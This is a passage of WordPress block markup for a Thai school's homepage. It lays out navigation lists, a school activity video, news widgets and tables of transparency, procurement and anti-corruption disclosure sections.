alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-48e80028 gb-button-text\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingW